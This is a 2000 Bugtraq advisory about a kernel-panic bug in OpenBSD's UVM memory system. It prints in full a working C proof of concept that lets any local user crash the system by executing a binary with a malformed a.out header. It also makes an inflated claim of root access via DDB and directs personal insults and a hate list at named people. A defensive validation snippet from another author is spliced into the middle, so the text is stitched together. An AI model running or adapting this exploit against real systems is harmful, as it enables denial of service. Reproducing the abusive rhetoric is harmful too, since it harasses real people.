[17500] in bugtraq
OpenBSD Exploit
daemon@ATHENA.MIT.EDU (rloxley)
Mon Nov 6 00:58:12 2000
Date: Sun, 5 Nov 2000 03:28:09 -0500
Reply-To: rloxley <rloxley@HACKPHREAK.ORG>
From: rloxley <rloxley@HACKPHREAK.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
[Attachment: hp2.adv]
- HP2 advisory % HP2 advisory % HP2 advisory % HP2 advisory % HP2 advisory % -
|
| www.hackphreak.org
|
| Version       : Hackphreak advisory #2 of many
| Author        : RLoxley [hackphreak / condemnation / EHAP / RSH / ZSH (soon)]
| Contributed   : All of Team Hackphreak (thanks a lot) & SSG
| Topic         : A non-privileged user may crash an OpenBSD Operating System,
|                 thus rendering the system useless.
| Affected      : All Operating Systems which use UVM (not MACH VM)
|                   * OpenBSD
|                   * NetBSD
| Prvt Release  : November 5th, 1998
| Released      : November 5th, 2000
| Credits       : www.hackphreak.org, zsh.interniq.org, www.subterrain.net
|                 Check Section 1
| Vendor status : Notified
|
- HP2 advisory % HP2 advisory % HP2 advisory % HP2 advisory % HP2 advisory % -


Section 1 [Greets]:

First and foremost, thanks to team hackphreak and SSG, great job!
SSG helped during the researching of the bug (bind, aempire, cripto).
This was a coordinated effort with Team Hackphreak and The Hacker
Collective known as SSG.

I would like to thank RootShellHackers and Team ZSH for rigorously
testing on many freenets :] (ratcorpse and her great mass testing
scripts, great for analysis: www.sneakerz.org/~rat < great site :)

I would like to thank caddis of TESO. He started the whole OpenBSD
war. Keep up the good work.

Special thanks to Mixter and his TFN2k. It has made my job much
easier.

I would also like to thank: EHAP, Condemnation, gov-boi (hack.co.za),
shinex (yf0rce :), ISS, Solar Designer, #hackphreak, #darknet,
#!/bin/zsh, #condemnation, #conf, Al Hugher, Aleph1, and my parents.


Section 2 [Preface]:

Usually Team HackPhreak keeps our code and research quite private
until we give lectures in our channel on undernet (#hackphreak). But what
really annoys us is when a very big figure in the security community acts
disrespectfully to the people who help build this internet infrastructure. This
person who I speak of is Theo de Raadt. Theo de Raadt claims that OpenBSD
hasn't experienced a local root hole in the default install for many years.
During his internal security audits, they find many bugs, yet they just
hide them, patch them, and never notify the public. This is very unethical
on the part of the OpenBSD team. I think you guys are lame. What worries
Team Hackphreak is how many other bugs have gone unnoticed. We have found
many other exploitable holes in previous OpenBSD distributions that have
miraculously been patched and never revealed. Next, there is the "Three
years without a remote hole in the default install". I hope this advisory
breaks that as well, because, technically:

* Log into the remote host
* Grab our exploit
* Crash the kernel

This bug is also exploitable via NFS.

Three years without a remote hole? Strike that.


Section 3 [Background]:

UVM is a newly developed virtual memory system which is currently
used in the OpenBSD Operating System. It is significantly better than the
traditional MACH based VM.


Section 4 [Problem Description]:

There exists a bug in the UVM code which has blatantly slipped past
the seemingly small-minded OpenBSD security auditors. The bug exists in the
anonymous mapping code in UVM. This bug allows for any local user (or remote
user) to crash the entire OpenBSD system, rendering it completely useless.
Once the system has crashed, a local user (with access to the terminal) may
in fact hack the system. The system drops into DDB (man it). DDB allows for
debugging of the actual kernel. When one has access to the kernel, they can
do most anything: such as reading disk buffers, reading _copyright, reading
network mbufs. So this scales to a most incredible attack, not just a DoS
(if you have read through this you have now more reason to switch to Linux).

A very smart attacker will:

* Crash the kernel
* Assume the location of the box which crashed (@ the colo)
* Use DDB to gain god status

A layout of the crash dump is given:

* trap()
* uvm_fault()
* uvmfault_amapcopy()
* amap_copy()
* amap_alloc()

------------------------------------------------------------------
struct vm_amap *
amap_alloc(sz, padsz, waitf)
    vaddr_t sz, padsz;
    int waitf;

/*
 * amap_alloc: allocate an amap to manage "sz" bytes of anonymous VM
 *
 * => caller should ensure sz is a multiple of PAGE_SIZE
 * => reference count to new amap is set to one
 * => new amap is returned unlocked
 */

{
    struct vm_amap *amap;
    int slots, padslots;
    UVMHIST_FUNC("amap_alloc"); UVMHIST_CALLED(maphist);

    AMAP_B2SLOT(slots, sz);         /* load slots */
    AMAP_B2SLOT(padslots, padsz);
------------------------------------------------------------------

The kernel crashes in the first instance of AMAP_B2SLOT(slots, sz).

------------------------------------------------------------------
#define AMAP_B2SLOT(S,B) { \
    if ((B) & (PAGE_SIZE - 1)) \
        panic("AMAP_B2SLOT: invalid byte count"); \
    (S) = (B) >> PAGE_SHIFT; \
}
------------------------------------------------------------------

Basically, if (sz & (PAGE_SIZE-1)) is true, the kernel
panic()'s. Not so cool Mr. Theo, my grandmother wouldn't even have
done something so stupid and all she has is an A+ and CCNA!

As aempirei, bind, and cripto pointed out: even if AMAP_B2SLOT()
is patched, the bug will still exist, henceforth because later
on down the yellow brick road, the kernel will crash in routines such as:

* amap_splitref()
* amap_lookup()

So a hacker will still be able to obtain root access. No thanks
to obecian for notifying Theo a wee bit early.
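
The check a loader should make on these untrusted header fields, as an added example that is neither the advisory's nor OpenBSD's code: it models AMAP_B2SLOT's page-alignment contract in user space and rejects an a.out image whose a_text or a_data is not a whole number of pages before the size can reach the allocator, which is where an a_data nudged by 3 bytes would otherwise panic. The classic BSD struct exec field layout and PAGE_SIZE 4096 are assumptions; whether the vendor fix rejected or rounded such images is not stated in the advisory.

```c
/* Added example (not the advisory's code): user-space model of the validation
 * an a.out loader should apply before segment sizes reach amap_alloc().
 * Assumed: classic BSD struct exec layout (eight 32-bit fields), PAGE_SIZE 4096. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define PAGE_SIZE  4096u
#define PAGE_SHIFT 12

struct aout_exec {
    uint32_t a_midmag, a_text, a_data, a_bss,
             a_syms, a_entry, a_trsize, a_drsize;
};

/* Checked counterpart of the advisory's AMAP_B2SLOT: an unaligned byte
 * count is reported to the caller instead of panicking the kernel. */
static int amap_b2slot_checked(uint32_t bytes, uint32_t *slots)
{
    if (bytes & (PAGE_SIZE - 1))
        return -1;
    *slots = bytes >> PAGE_SHIFT;
    return 0;
}

/* Validate the segment sizes of a raw a.out image.  Returns the number of
 * amap slots text+data would need, or -1 if the image must be rejected. */
long aout_image_slots(const unsigned char *img, size_t len)
{
    struct aout_exec hdr;
    uint32_t tslots, dslots;
    if (len < sizeof hdr)                       /* truncated header */
        return -1;
    memcpy(&hdr, img, sizeof hdr);              /* no unaligned pointer cast */
    if (hdr.a_text > UINT32_MAX - hdr.a_data)   /* size sum must not wrap */
        return -1;
    if (amap_b2slot_checked(hdr.a_text, &tslots) < 0 ||
        amap_b2slot_checked(hdr.a_data, &dslots) < 0)
        return -1;                              /* a_data += 3 is caught here */
    return (long)tslots + dslots;
}

/* Constructed test image: a header with the given sizes, other fields zero. */
long slots_for_sizes(uint32_t a_text, uint32_t a_data)
{
    unsigned char img[sizeof(struct aout_exec)];
    struct aout_exec hdr = { 0 };
    hdr.a_text = a_text; hdr.a_data = a_data;
    memcpy(img, &hdr, sizeof hdr);
    return aout_image_slots(img, sizeof img);
}
```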


Section 4 [The exploit]:

// PUBLIC RELEASE
//
// krnl-DoS.c by RLoxley of Team Hackphreak (#hackphreak on unet) & SSG
//
// This exploit is proof of concept code. It exploits the UVM bug in
// all OpenBSD kernels. It can also be used to gain god access via
// ddb during the crash recovery phase of OpenBSD's security structure.
//
// Greets: #hackphreak, RootShellHackers, ZSH (#!/bin/zsh), EHAP,
// Condemnation, caddis[TESO], Solar Designer, gov-boi,
// #darknet, ISS, #conf, Al Hugher, Aleph1, shinex (for porting)
// SSG, www.subterrain.net
//
// PS: The exploit is broke very slightly, so this takes some knowledge ;)
//
// PUBLIC RELEASE


#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <a.out.h>
#include <fcntl.h>
#include <sys/types.h>

#define CRASH_FILE "./f0rKb0mB"

extern int errno;

int
main(int argc, char *argv[])
{
    struct exec *ehdr;
    struct stat statbuf;
    int fd;
    unsigned char *data;


    fd = open(argv[0], O_RDONLY);
    if (fd < 0)
    {
        perror("main() : open(argv[0]) ");
        exit(-1);
    }

    if (fstat(fd, &statbuf) < 0)
    {
        perror("main() : fstat() ");
        exit(-1);
    }

    data = (unsigned char *) malloc(statbuf.st_size);
    if (data == NULL)
    {
        perror("main() : malloc() ");
        exit(-1);
    }

    if (read(fd, data, statbuf.st_size) <= 0)
    {
        puts("main() : read() Failure");
        exit(-1);
    }

    ehdr = (struct exec *) data;

    close(fd);

    unlink(CRASH_FILE);

    fd = open(CRASH_FILE, O_RDWR | O_CREAT, S_IXUSR);
    if (fd < 0)
    {
        perror("main() : open(CRASH_FILE) ");
        exit(-1);
    }

    ehdr->a_data += 3;

    if (write(fd, data, statbuf.st_size) < 0)
    {
        perror("main() : write() ");
        exit(-1);
    }

    close(fd);

    if (execlp(CRASH_FILE, NULL) < 0)
    {
        perror("main() : execlp() ");
        exit(-1);
    }

    return (0);
}


Section 5 [TO HELL WITH YOU'S]:

Theo de Raadt and the OpenBSD Team

Paedophiles

Racists

All of #kkk on undernet

All of the people who disturb my channel

BoW

frys / prophet

b0g

Scriptkiddies all over the place

obecian


Section 6 [Come 1 Come ALL]:

Team Hackphreak invites you to undernet #hackphreak for a great
learning experience. Just join us to teach and learn. But remember,
HARASSMENT = BAN. www.hackphreak.org/newbie.


Section 7 [Lies]:

I hope this advisory brings you closer to NT / Linux, rather than
OpenBSD. Linux & NT are way better anyway.